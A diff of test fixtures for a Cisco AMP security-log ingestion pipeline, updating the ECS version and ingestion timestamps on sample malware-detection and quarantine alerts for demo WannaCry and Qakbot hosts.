@@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3807,7 +3807,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500222246Z", + "ingested": "2021-09-13T18:07:28.111229346Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3858,7 +3858,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3878,7 +3878,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500224289Z", + "ingested": "2021-09-13T18:07:28.111231419Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3944,7 +3944,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3974,7 +3974,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500226335Z", + "ingested": "2021-09-13T18:07:28.111233495Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4031,7 +4031,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4051,7 +4051,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500228382Z", + "ingested": "2021-09-13T18:07:28.111235554Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -4102,7 +4102,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4122,7 +4122,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500230510Z", + "ingested": "2021-09-13T18:07:28.111237711Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4177,7 +4177,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4197,7 +4197,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500232553Z", + "ingested": "2021-09-13T18:07:28.111239763Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4254,7 +4254,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4284,7 +4284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500234601Z", + "ingested": "2021-09-13T18:07:28.111241843Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4339,7 +4339,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4369,7 +4369,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500236656Z", + "ingested": "2021-09-13T18:07:28.111243912Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4424,7 +4424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4454,7 +4454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500238724Z", + "ingested": "2021-09-13T18:07:28.111245976Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4509,7 +4509,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4539,7 +4539,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500240848Z", + "ingested": "2021-09-13T18:07:28.111248029Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4594,7 +4594,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4624,7 +4624,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500242912Z", + "ingested": "2021-09-13T18:07:28.111250102Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4679,7 +4679,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4709,7 +4709,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500244968Z", + "ingested": "2021-09-13T18:07:28.111252179Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4764,7 +4764,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4794,7 +4794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500247029Z", + "ingested": "2021-09-13T18:07:28.111254243Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4849,7 +4849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4879,7 +4879,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500249078Z", + "ingested": "2021-09-13T18:07:28.111256297Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4934,7 +4934,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4964,7 +4964,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500251139Z", + "ingested": "2021-09-13T18:07:28.111258359Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -5017,7 +5017,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5037,7 +5037,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500253189Z", + "ingested": "2021-09-13T18:07:28.111260412Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log similarity index 100% 